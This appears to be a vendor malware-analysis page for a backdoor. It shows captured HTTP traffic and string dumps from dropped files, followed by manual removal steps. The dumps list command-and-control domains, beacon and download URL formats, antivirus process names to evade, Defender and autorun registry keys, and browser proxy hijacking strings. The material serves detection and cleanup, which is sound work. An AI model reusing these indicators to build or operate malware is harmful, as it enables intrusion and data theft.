Date: Sat, 29 Mar 2014 01:55:29 GMT
Connection: close
X-CCC: SE
X-CID: 2
MSCF............,...................I.................lDxa .authroot.s
tl......8..CK...<T...g.v!M.d..f.%d..}K..5..F..d'K......%K..%...!..=
.k..........{=/....{g.~..........<.....h..b...8..Ep.x.....G. .....p
q..``a.i|"n|8...!..gv...: I........!...%$....;PBHA.....!A....L...'...:
..0...I....fD"N#...._..?....E..m..1\.$...{P....:......../...\YB.m:....
.dE.....)...V....$....Dn:....0E..S."...o..q.....K...I..K...(x%....>
A.R...`.0 .........<`L0mp...%....y.....g.n...R0Op..<..,....`0$z.
@....x"....T..H...<.CQ..H.M.K.".H....`.....!.G....AF\.{...V..LCy.i 
y..Q.'..M...bE.%..<...nG.3..\K.t..ah...5Z~.h...8..@.).... ....X...v
..,.-.M..u.......Z"..U...0:O%..}.(t............=R.......[b...z.....8..
)........M|..g..L.a...>....[.E&..{..|..t...[t..B......./[..&.L`.w..
..[L..ZW.... ."....<...I.G\.H[:...B.B.qT... ..(....: U....(.J.....?
._..'..Hp..o.B......!......bj.G.u^.%\r..b...*7.[nO..S...b.l@jn. .Hb...
M.....9.....8.='...)\.....M.#.M......L.Jh.../..G.!\.Y....&.....P^...,.
.U..3...W...._...0..?*...KZ....fM...8.6U..aG.a.......~....?.N. .3.....
,>.rH..*O..E..T0.......?i...k.T.'>".....E....%SK.v..8...t.:...].
E.K2....u..../i.t.9....2N..QI ..h..t..Ad....0.........*...R......|....
..7A:bP. n:.......Fk.[q....]D.......3.0.)...G]..?4.o...p......?...3...
[email protected]#.n\.-....p.T..G............4.......:H....2..9.|.`~0GL.=....u.y.
..L0iL.....A....^[email protected]#.T...{.......P.....[..j....
.i.%[email protected].@......]%..g.1..3Z6^<
;!.Q...m......9....l..x.....$7..[.....L........L....F*....D.U.'...
<<< skipped >>>


GET /msdownload/update/v3/static/trustedr/en/authrootseq.txt HTTP/1.1
Connection: close
Accept: */*
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
Host: VVV.download.windowsupdate.com
Pragma: no-cache


HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Wed, 12 Mar 2014 05:29:31 GMT
Accept-Ranges: bytes
ETag: "806f4cbb43dcf1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 18
Date: Sat, 29 Mar 2014 01:55:29 GMT
Connection: close
X-CCC: SE
X-CID: 2
1401CF3DB40B609892..



GET /logo.png?tq=gHZutHoLpb2HdjbiNAjrpsSCJbO+V98lHA==&pr=41 HTTP/1.0
Connection: close
Host: worldorderlive.com
Accept: */*
User-Agent: chrome/9.0


HTTP/1.0 200 (OK)
Cache-Control: private, no-cache, must-revalidate
Connection: Keep-Alive
Pragma: no-cache
Server: Oversee Turing v1.0.0
Content-Length: 1420
Content-Type: text/html
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Keep-Alive: timeout=3, max=81
P3P: policyref="hXXp://VVV.dsparking.com/w3c/p3p.xml", CP="NOI DSP COR ADMa OUR NOR STA"
Set-Cookie: parkinglot=1; domain=.worldorderlive.com; path=/; expires=Sun, 30-Mar-2014 01:55:28 GMT
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN" "hXXp://
VVV.w3.org/TR/html4/frameset.dtd">.<!-- turing_cluster_prod --&g
t;.<html>.  <head>.    <meta http-equiv="Content-Type" 
content="text/html; charset=utf-8" />..    <title>worldorderl
ive.com</title>.    <meta name="keywords" content="worldorder
live.com" />.    <meta name="description" content="worldorderliv
e.com" />.    <meta name="robots" content="index, follow" />.
    <meta name="revisit-after" content="10" />...    <meta na
me="viewport" content="width=device-width, initial-scale=1.0" /> ..
.    .    <script type="text/javascript">.      document.cookie 
= "jsc=1";.    </script>..  </head>.  <frameset rows="1
00%,*" frameborder="no" border="0" framespacing="0">.    <frame 
src="hXXp://worldorderlive.com?epl=RVMWgRUNFl9uv0mXknhcMBAX03sPCYVTJHf
x37ALuc5zKR4B0YzLPUzkDwlng5k0JCJAKyBzgIht74zgzNBNaJ8VPEHChTFReDJHHEUhQ
i75jIVtRUWKIwyukB2sdbchwtlqkZm3Yapi2Y7mT92nlGYaGiTTaHqaakJPDZA8NA0amXp
QT3pUQ5UAIJDfr78AAGB_AQAAQIDbCgAAcTG991lTJllBMTZoWkKdAAAA8A" name="wor
ldorderlive.com">.  </frameset>.  <noframes>..<body&
gt;<a href="hXXp://worldorderlive.com?epl=RVMWgRUNFl9uv0mXknhcMBAX0
3sPCYVTJHfx37ALuc5zKR4B0YzLPUzkDwlng5k0JCJAKyBzgIht74zgzNBNaJ8VPEHChTF
ReDJHHEUhQi75jIVtRUWKIwyukB2sdbchwtlqkZm3Yapi2Y7mT92nlGYaGiTTaHqaakJPD
ZA8NA0amXpQT3pUQ5UAIJDfr78AAGB_AQAAQIDbCgAAcTG991lTJllBMTZoWkKdAAAA8A"
>Click here to go to worldorderlive.com</a>.</body>
<<< skipped >>>
Clive Barker - Books Of Blood 03.exe_172:

.text
`.rdata
@.data
@.rsrc
WSSSSh
^SShq
SSSh4&A
SSh<'A
%.*s(%d)%s
rtmp%d
__tmp_rar_sfx_access_check_%u
sfxcmd
COMCTL32.DLL
riched20.dll
riched32.dll
COMCTL32.dll
GetProcessHeap
GetCPInfo
KERNEL32.dll
USER32.dll
GDI32.dll
COMDLG32.dll
RegCloseKey
RegCreateKeyExA
RegOpenKeyExA
ADVAPI32.dll
SHFileOperationA
ShellExecuteExA
SHELL32.dll
ole32.dll
OLEAUT32.dll
WINRAR.SFX
d:\Projects\WinRAR\SFX\build\sfxrar32\Release\sfxrar.pdb
C:\DOCUME~1\test\LOCALS~1\Temp\nsp4.tmp\Clive Barker - Books Of Blood 03.exe
:(,4;<=>;?@
3,45657879
8888888888887
version="1.0.0.0"
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
publicKeyToken="6595b64144ccf1df"
Shell.Explorer
Enter password
&Enter password for the encrypted file:
Extracting %s
Skipping %s
The file "%s" header is corrupt%The archive comment header is corrupt
Unknown method in %s
Cannot open %s
Cannot create %s
Cannot create folder %s
6CRC failed in the encrypted file %s (wrong password ?)
CRC failed in %s
Packed data CRC failed in %s
Wrong password for %s5Write error in the file %s. Probably the disk is full
Read error in the file %s
Extracting from %s
ErroraErrors encountered while performing the operation
Please close all applications, reboot Windows and restart this installation\Some installation files are corrupt.

3R2R.exe_1728:




`.rsrc
PSSh$
SSShbU@
SSj%S
<%u,V
<3%u1f
GetProcessWindowStation
operator
deflate 1.2.5 Copyright 1995-2010 Jean-loup Gailly and Mark Adler
1.2.5
inflate 1.2.5 Copyright 1995-2010 Mark Adler
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
\sc.exe
ntdll.dll
iexplore.exe
opera.exe
firefox.exe
safari.exe
chrome.exe
AVGIDSMonitor.exe
AVGIDSAgent.exe
avgchsvx.exe
avgemcx.exe
avgnsx.exe
avgrsx.exe
avgtray.exe
avgwdsvc.exe
avgnt.exe
ccsvchst.exe
AvastUI.exe
mcagent.exe
SOFTWARE\Microsoft\Windows Defender\Real-Time Protection
SOFTWARE\Microsoft\Windows Defender
SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer
explorer.exe
Windows Security Center
%s\shell32.dll,Control_RunDLL "%s\wscui.cpl",Security Center
rundll32.exe
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Windows Defender
at %d:%d "%s" %s
win32iexplore.exe
win32opera.exe
win32firefox.exe
win32safari.exe
win32winword.exe
win32excel.exe
win32outlook.exe
win32photoshop.exe
win32wmplayer.exe
win32java.exe
win32itunes.exe
win32msmsgs.exe
java.exe
*.log
%s:\windows\system32\%s.tmp
%s:\windows\syswow64\%s.tmp
%s:\WINNT\system32\%s.tmp
%s:\WINNT\syswow64\%s.tmp
Find Temporary files is %d
cannot open files %s, Open next files ?
{A1D429DE-B782-4253-84AD-6E09A8438AD5}
\Windows NT
Software\Microsoft\Windows\CurrentVersion\Run
%s\%s
%s.%s
stor.cfg
exec%s
{35BCA615-C82A-4152-8857-BCC626AE4C8D}
{4D92BB9F-9A66-458f-ACA4-66172A7016D4}
lvvm.exe
{C0429A47-0CF0-4d1b-9616-C588FA0A3DDB}
{43B671F0-5D50-4dbe-AD9C-64A6167C57AD}
{6B985724-623F-492e-B0D6-C9715ADE853B}
{B37C48AF-B05C-4520-8B38-2FE181D5DC78}
{95F6585C-CC1E-4b52-A63B-9FBC6A94F371}
Advapi32.dll
%s%s_1
%s_0_%d_%s
%s_%d
%s_%d_%d_%d_%d
%s_%s
http://
POST %s HTTP/1.1
Host: %s
User-Agent: mozilla/2.0
Content-Length: %u
POST http://%s%s HTTP/1.1
HTTP/1.0 200 OK
HTTP/1.1 200 OK
%s?tq=%s
id=%s&p3=0&p4=0&hwid=%s&c=%d&nax=7&ver=111
%s_%s_%d
_1_%d
_2_%d
_3_%d
_4_%d
http://worldorderlive.com
http://rumperstumprs.com
http://transaerosystems.com
http://freeridershools.com
http://ourbigdrophills.com
http://mydbonlineaccess.com
http://onlinepdahelpforyou.com
http://remarkreddomas.com
http://transfersakkonline.com
http://backupdomaintolevel.com
SELECT_RESERV_SRV_%d
%s_%d_%s
id=%s&c=%d
%s_%d_%d_%d
%s_%d_%d
%s %s
%s start%s%c%s
c1.exe
c2.exe
c3.exe
DWN_CON_STRP_%d_%s
http://%d.ctrl.%s
logo.png
img/135.png
img/136.png
t=%s&p4=0&q=%s&z22=0&s=%d&hrs=%d
t=%s&q=&s=%d&hrs=%d
%s/%s?tq=%s&pr=%d
%s:%d/%s?tq=%s&pr=%d
http://armoredlegion.com/305986.png
http://armoredlegion.com/16354.png
http://armoredlegion.com/716354_m61.png
http://mektek.net/thelab/wiley.jpg
http://knowledgesutra.com/img/temp/hi.cgi
http://knowledgesutra.com/img/temp/head.png
http://battleon.com/134.gif
http://battleon.com/132.gif
http://battleon.com/133.gif
http://browsermmorpg.com/images/cpc.png
http://browsermmorpg.com/images/cpc2.png
http://browsermmorpg.com/img/intel.gif
http://browsermmorpg.com/img/intel.jpg
http://012webpages.com/christian12.jpg
http://012webpages.com/christian13.jpg
http://012webpages.com/christian14.jpg
http://tri-countymech.com/g/livechat.png
http://tri-countymech.com/g/logo.png
http://tri-countymech.com/g/133.jpg
http://tri-countymech.com/g/134.jpg
http://electronicstheory.com/pics/valley.png
http://electronicstheory.com/pics/sun.png
http://classicbattletech.com/lhous3.gif
http://classicbattletech.com/lhous4.gif
http://classicbattletech.com/lhous5.gif
http://classicbattletech.com/lhous6.gif
http://engineeringcrossing.com/images/misc/23525.png
http://engineeringcrossing.com/images/misc/64646.png
t=t&hrs=%d&q=id=1000&ver=%s&s=%d
t=ip&hrs=%d&q=&s=1
%s?pr=%s
\bl%d_64.bat
del "%s"
if exist "%s" goto a
cmd.exe /c "%s"
%s.zl
{ÕD9E4E0-906C-4B81-B1BF-2E9A76248146}_%d
{C66E79CE-8935-4ed9-A6B1-4983619CB925}
{61B98B86-5F44-42b3-BCA1-33904B067B81}
{B16C7E24-B3B8-4962-BF5E-4B33FD2DFE78}
{0ECE180F-6E9E-4FA6-A154-6876D9DB8906}
GET %s HTTP/1.0
http://xprstats.com/images/logo.png
drweb
id=%s&hwid=%s&ver=%d&os=%s&av=%s&wd=%d&fw=%s&port=%d
t=ml&q=%s
xprstats.com
http://%s%s
ldr.ini
reportfrommains.com
http://%s/s.php?c=121&id=%s
onlinereportsystem.com
%s_1_%d_%s
%s_2_%d_%s
%s_3_%d_%s
%s_4_%d_%s
pmv=2&id=%s&hwid=%s
u.exe
%s up%s
&%s=%s
PRM_LSTN_THIS_PORT
127.0.0.1
HTTP/1.x
google.com
http://www.google.com
HTTP/1.1 302 Found
Location: %s
id=%s&type=%d&ppcid=%s
%s: %s
%s_5_%s
http=127.0.0.1:
prefs.js
Mozilla
"network.proxy.http"
"network.proxy.http_port"
"network.proxy.type"
"127.0.0.1"
%s(%s, %s);
operaprefs.ini
Opera
Use HTTP
HTTP server
127.0.0.1:%s
%s=%s
%s:%s
hwid=%s&yui=2&id=%s&step=1&wd=%d&rvn=56&av=%s
id=%s&hwid=%s
exec|%s
http=
bing.com
yahoo.com
search.aol.
suche.aol.
searcht2.aol.
.yimg.com
.bing.net
scorecardresearch.com
brightcove.com
.aol.
.atwola.
.ivwbox.
.google
.atdmt.
.abmr.
.tacoda.
.adtechus.
.autodatadirect.
.mapquestapi.
.ggpht.
.virtualearth.
.opera.
.microsoft.
.wsod.
.doubleclick.
.ypcdn.
.truveo.
.tlowdb.
mapq.st
.dartsearch.
.thawte.
http://
bing.com/search
search.yahoo.com/search
%s_1_%s
err%d%s_%d_%d
err0%s_%d_%d
ver=111&system=%d&id=%s&hwid=%s&search=%s&referer=%s&useragent=%s&lang=%s&type=%d
%s:443/%s
%s_2_%s
%s_%s_%s
%s_3_%s
www.www.ru
https://
.doubleclick.net
doubleclick.net
msn.com
%s_0%d_%d
=='undefined'?'%s':'%s'
.referrer
HTTP/1.0
User-Agent: chrome/9.0
%s %s %s
http://www.google.com/
http://www.yahoo.com/
.class
.midi
google_ad.url
google_ad.title
r.msn.com
google_ad.line1
zcÁ
C:\DOCUME~1\test\LOCALS~1\Temp\nsp4.tmp\3R2R.exe
%Program Files%\C6249
%Documents and Settings%\%current user%\Application Data\649C6
%Program Files%\LP\4566
.text
`.rdata
@.data
.rsrc
8888888
N ssh
hssHe
w:.WM
IPHLPAPI.DLL
EnumChildWindows
newdev.dll
SHELL32.dll
SETUPAPI.dll
MPRAPI.dll
KERNEL32.dll
GetCPInfo
EY%Snkx
GetProcessHeap
RegCreateKeyExA
RegCloseKey
RegOpenKeyExA
RegFlushKey
ShellExecuteA
SHDeleteKeyA
keybd_event
EnumWindows
WinHttpOpenRequest
WinHttpQueryDataAvailable
WinHttpCloseHandle
WinHttpConnect
WinHttpSendRequest
WinHttpReceiveResponse
WinHttpReadData
WinHttpOpen
KERNEL32.DLL
ADVAPI32.dll
ole32.dll
OLEAUT32.dll
PSAPI.DLL
RASAPI32.dll
RPCRT4.dll
SHLWAPI.dll
USER32.dll
WINHTTP.dll
WININET.dll
WS2_32.dll
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
mscoree.dll
WUSER32.DLL
\Registry\Machine\System\CurrentControlSet\Services\%s
Dr.Web
mhttp=127.0.0.1:%d
http://www.yahoo.com
2.0.2.1

3R2R.exe_1728_rwx_00400000_00068000:




`.rsrc
PSSh$
SSShbU@
SSj%S
<%u,V
<3%u1f
GetProcessWindowStation
operator
deflate 1.2.5 Copyright 1995-2010 Jean-loup Gailly and Mark Adler
1.2.5
inflate 1.2.5 Copyright 1995-2010 Mark Adler
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
\sc.exe
ntdll.dll
iexplore.exe
opera.exe
firefox.exe
safari.exe
chrome.exe
AVGIDSMonitor.exe
AVGIDSAgent.exe
avgchsvx.exe
avgemcx.exe
avgnsx.exe
avgrsx.exe
avgtray.exe
avgwdsvc.exe
avgnt.exe
ccsvchst.exe
AvastUI.exe
mcagent.exe
SOFTWARE\Microsoft\Windows Defender\Real-Time Protection
SOFTWARE\Microsoft\Windows Defender
SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer
explorer.exe
Windows Security Center
%s\shell32.dll,Control_RunDLL "%s\wscui.cpl",Security Center
rundll32.exe
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Windows Defender
at %d:%d "%s" %s
win32iexplore.exe
win32opera.exe
win32firefox.exe
win32safari.exe
win32winword.exe
win32excel.exe
win32outlook.exe
win32photoshop.exe
win32wmplayer.exe
win32java.exe
win32itunes.exe
win32msmsgs.exe
java.exe
*.log
%s:\windows\system32\%s.tmp
%s:\windows\syswow64\%s.tmp
%s:\WINNT\system32\%s.tmp
%s:\WINNT\syswow64\%s.tmp
Find Temporary files is %d
cannot open files %s, Open next files ?
{A1D429DE-B782-4253-84AD-6E09A8438AD5}
\Windows NT
Software\Microsoft\Windows\CurrentVersion\Run
%s\%s
%s.%s
stor.cfg
exec%s
{35BCA615-C82A-4152-8857-BCC626AE4C8D}
{4D92BB9F-9A66-458f-ACA4-66172A7016D4}
lvvm.exe
{C0429A47-0CF0-4d1b-9616-C588FA0A3DDB}
{43B671F0-5D50-4dbe-AD9C-64A6167C57AD}
{6B985724-623F-492e-B0D6-C9715ADE853B}
{B37C48AF-B05C-4520-8B38-2FE181D5DC78}
{95F6585C-CC1E-4b52-A63B-9FBC6A94F371}
Advapi32.dll
%s%s_1
%s_0_%d_%s
%s_%d
%s_%d_%d_%d_%d
%s_%s
http://
POST %s HTTP/1.1
Host: %s
User-Agent: mozilla/2.0
Content-Length: %u
POST http://%s%s HTTP/1.1
HTTP/1.0 200 OK
HTTP/1.1 200 OK
%s?tq=%s
id=%s&p3=0&p4=0&hwid=%s&c=%d&nax=7&ver=111
%s_%s_%d
_1_%d
_2_%d
_3_%d
_4_%d
http://worldorderlive.com
http://rumperstumprs.com
http://transaerosystems.com
http://freeridershools.com
http://ourbigdrophills.com
http://mydbonlineaccess.com
http://onlinepdahelpforyou.com
http://remarkreddomas.com
http://transfersakkonline.com
http://backupdomaintolevel.com
SELECT_RESERV_SRV_%d
%s_%d_%s
id=%s&c=%d
%s_%d_%d_%d
%s_%d_%d
%s %s
%s start%s%c%s
c1.exe
c2.exe
c3.exe
DWN_CON_STRP_%d_%s
http://%d.ctrl.%s
logo.png
img/135.png
img/136.png
t=%s&p4=0&q=%s&z22=0&s=%d&hrs=%d
t=%s&q=&s=%d&hrs=%d
%s/%s?tq=%s&pr=%d
%s:%d/%s?tq=%s&pr=%d
http://armoredlegion.com/305986.png
http://armoredlegion.com/16354.png
http://armoredlegion.com/716354_m61.png
http://mektek.net/thelab/wiley.jpg
http://knowledgesutra.com/img/temp/hi.cgi
http://knowledgesutra.com/img/temp/head.png
http://battleon.com/134.gif
http://battleon.com/132.gif
http://battleon.com/133.gif
http://browsermmorpg.com/images/cpc.png
http://browsermmorpg.com/images/cpc2.png
http://browsermmorpg.com/img/intel.gif
http://browsermmorpg.com/img/intel.jpg
http://012webpages.com/christian12.jpg
http://012webpages.com/christian13.jpg
http://012webpages.com/christian14.jpg
http://tri-countymech.com/g/livechat.png
http://tri-countymech.com/g/logo.png
http://tri-countymech.com/g/133.jpg
http://tri-countymech.com/g/134.jpg
http://electronicstheory.com/pics/valley.png
http://electronicstheory.com/pics/sun.png
http://classicbattletech.com/lhous3.gif
http://classicbattletech.com/lhous4.gif
http://classicbattletech.com/lhous5.gif
http://classicbattletech.com/lhous6.gif
http://engineeringcrossing.com/images/misc/23525.png
http://engineeringcrossing.com/images/misc/64646.png
t=t&hrs=%d&q=id=1000&ver=%s&s=%d
t=ip&hrs=%d&q=&s=1
%s?pr=%s
\bl%d_64.bat
del "%s"
if exist "%s" goto a
cmd.exe /c "%s"
%s.zl
{ÕD9E4E0-906C-4B81-B1BF-2E9A76248146}_%d
{C66E79CE-8935-4ed9-A6B1-4983619CB925}
{61B98B86-5F44-42b3-BCA1-33904B067B81}
{B16C7E24-B3B8-4962-BF5E-4B33FD2DFE78}
{0ECE180F-6E9E-4FA6-A154-6876D9DB8906}
GET %s HTTP/1.0
http://xprstats.com/images/logo.png
drweb
id=%s&hwid=%s&ver=%d&os=%s&av=%s&wd=%d&fw=%s&port=%d
t=ml&q=%s
xprstats.com
http://%s%s
ldr.ini
reportfrommains.com
http://%s/s.php?c=121&id=%s
onlinereportsystem.com
%s_1_%d_%s
%s_2_%d_%s
%s_3_%d_%s
%s_4_%d_%s
pmv=2&id=%s&hwid=%s
u.exe
%s up%s
&%s=%s
PRM_LSTN_THIS_PORT
127.0.0.1
HTTP/1.x
google.com
http://www.google.com
HTTP/1.1 302 Found
Location: %s
id=%s&type=%d&ppcid=%s
%s: %s
%s_5_%s
http=127.0.0.1:
prefs.js
Mozilla
"network.proxy.http"
"network.proxy.http_port"
"network.proxy.type"
"127.0.0.1"
%s(%s, %s);
operaprefs.ini
Opera
Use HTTP
HTTP server
127.0.0.1:%s
%s=%s
%s:%s
hwid=%s&yui=2&id=%s&step=1&wd=%d&rvn=56&av=%s
id=%s&hwid=%s
exec|%s
http=
bing.com
yahoo.com
search.aol.
suche.aol.
searcht2.aol.
.yimg.com
.bing.net
scorecardresearch.com
brightcove.com
.aol.
.atwola.
.ivwbox.
.google
.atdmt.
.abmr.
.tacoda.
.adtechus.
.autodatadirect.
.mapquestapi.
.ggpht.
.virtualearth.
.opera.
.microsoft.
.wsod.
.doubleclick.
.ypcdn.
.truveo.
.tlowdb.
mapq.st
.dartsearch.
.thawte.
http://
bing.com/search
search.yahoo.com/search
%s_1_%s
err%d%s_%d_%d
err0%s_%d_%d
ver=111&system=%d&id=%s&hwid=%s&search=%s&referer=%s&useragent=%s&lang=%s&type=%d
%s:443/%s
%s_2_%s
%s_%s_%s
%s_3_%s
www.www.ru
https://
.doubleclick.net
doubleclick.net
msn.com
%s_0%d_%d
=='undefined'?'%s':'%s'
.referrer
HTTP/1.0
User-Agent: chrome/9.0
%s %s %s
http://www.google.com/
http://www.yahoo.com/
.class
.midi
google_ad.url
google_ad.title
r.msn.com
google_ad.line1
zcÁ
C:\DOCUME~1\test\LOCALS~1\Temp\nsp4.tmp\3R2R.exe
%Program Files%\C6249
%Documents and Settings%\%current user%\Application Data\649C6
%Program Files%\LP\4566
.text
`.rdata
@.data
.rsrc
8888888
N ssh
hssHe
w:.WM
IPHLPAPI.DLL
EnumChildWindows
newdev.dll
SHELL32.dll
SETUPAPI.dll
MPRAPI.dll
KERNEL32.dll
GetCPInfo
EY%Snkx
GetProcessHeap
RegCreateKeyExA
RegCloseKey
RegOpenKeyExA
RegFlushKey
ShellExecuteA
SHDeleteKeyA
keybd_event
EnumWindows
WinHttpOpenRequest
WinHttpQueryDataAvailable
WinHttpCloseHandle
WinHttpConnect
WinHttpSendRequest
WinHttpReceiveResponse
WinHttpReadData
WinHttpOpen
KERNEL32.DLL
ADVAPI32.dll
ole32.dll
OLEAUT32.dll
PSAPI.DLL
RASAPI32.dll
RPCRT4.dll
SHLWAPI.dll
USER32.dll
WINHTTP.dll
WININET.dll
WS2_32.dll
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
mscoree.dll
WUSER32.DLL
\Registry\Machine\System\CurrentControlSet\Services\%s
Dr.Web
mhttp=127.0.0.1:%d
http://www.yahoo.com
2.0.2.1

Explorer.EXE_1644_rwx_01370000_0000A000:




&ew%.YY
ver76%sdhpj
SafariChromeFi~
PSShx47
.exeu]
%sdhpjelxr.php?adv=adv401&code1=%s&code2=%s&id=%d&p=%s&b=%s&c=%d
Chrome
Firefox
Opera
%sgkih.exe
%subsnltn.php?adv=adv401&id=%d&c=%d
%sdesk.exe
%sjnupkvq.php?adv=adv401&id=%d&c=%d
%splmnimmi.exe
%srvdojqpje.php?adv=adv401&id=%d&c=%d
%snkamk.exe
%sevpxez.php?adv=adv401&id=%d&c=%d
%sgywaume.exe
%simgbidoje.php?adv=adv401&id=%d&c=%d
%snildxk.exe
%sarzgbzhf.php?adv=adv401&id=%d&c=%d
%ssqpvrlh.exe
%sizucahpkip.php?adv=adv401&id=%d&c=%d
%scmameeao.exe
%snvmkfmhfa.php?adv=adv401&id=%d&c=%d
%smuis.exe
%sjwezxfzk.php?adv=adv401&id=%d&c=%d
%sdsdfca.exe
%swqtkipkiqk.php?adv=adv401&id=%d&c=%d
%suxwdet.exe
%szdlfahcaip.php?adv=adv401&id=%d&c=%d
%sctbidkjq.php?adv=adv401&id=%d&c=%d
http://bascheme.com/dpxezto/
http://aahacker.com/dpxezto/
psapi.dll
ddraw.dll
urlmon.dll
shell32.dll
kernel32.dll
user32.dll
wininet.dll
ntdll.dll
\svchost.exe
explorer.exe
C:\DOCUME~1\test\LOCALS~1\Temp\nsp4.tmp\2 Gansta.exe
ShellExecuteExA
InternetOpenUrlA
.text
`.rdata
@.data
.reloc
KERNEL32.DLL
ADVAPI32.dll
DDRAW.dll
PSAPI.DLL
SHELL32.dll
SHLWAPI.dll
USER32.dll
WININET.dll






Remove it with Ad-Aware




    

  1. Click (here) to download and install Ad-Aware Free Antivirus.
    2. 

  2. Update the definition files.
    3. 

  3. Run a full scan of your computer.
    4. 





Manual removal*




    

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):
    

    %original file name%.exe:356
    Clive Barker - Books Of Blood 03.exe:172
    2 Gansta.exe:1372
    3R2R.exe:788
    3R2R.exe:204
    B.tmp:328
    ic5.exe:316
    

    2. 

  2. Delete the original Backdoor file.
    3. 

  3. Delete or disinfect the following files created/modified by the Backdoor:
    

    %Documents and Settings%\%current user%\Local Settings\Temp\nsp4.tmp\2 Gansta.exe (6656 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsp3.tmp (1009046 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsp4.tmp\3R2R.exe (290816 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsp4.tmp\Clive Barker - Books Of Blood 03.exe (530913 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsp4.tmp\ic5.exe (194048 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Application Data\649C6\6249.49C (2301 bytes)
    %System%\config\software.LOG (25600 bytes)
    %Program Files%\LP\4566\B.tmp (102912 bytes)
    %Program Files%\LP\4566\C29.exe (555008 bytes)
    %Program Files%\LP\4566\C.exe (1389 bytes)
    %System%\config\SOFTWARE (102400 bytes)
    

    4. 

  4. Delete the following value(s) in the autorun key (How to Work with System Registry):
    

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "C29.exe" = "%Program Files%\LP\4566\C29.exe"
    

    5. 

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
    6. 

  6. Reboot the computer.
    7. 



*Manual removal may cause unexpected system behaviour and should be performed at your own risk.












 
 




 
No votes yet












				


							


			

				
					  
							

		

		


					
							

	

	
	        


	

        
      
 

      
      

      
    
 

    
  
 

		


		

		
			

			

				

					Lavasoft is the maker of Ad-Aware,
					the world's most popular anti-malware 
					software with over 450 million 
					downloads.
				

				

					© 2026 Lavasoft. All rights reserved.

					Terms Of Use |   Privacy Policy
					


								

			


		

		


	

	
	

	

		x
		
Our best antivirus yet!

		
Fresh new look. Faster scanning. Better protection.

		

			
Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

			
For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

			
			Download adaware antivirus 12
		

		No thanks, continue to lavasoft.com
	

	

		

			close x
			
Discover the new adaware antivirus 12

			
Our best antivirus yet

			Download Now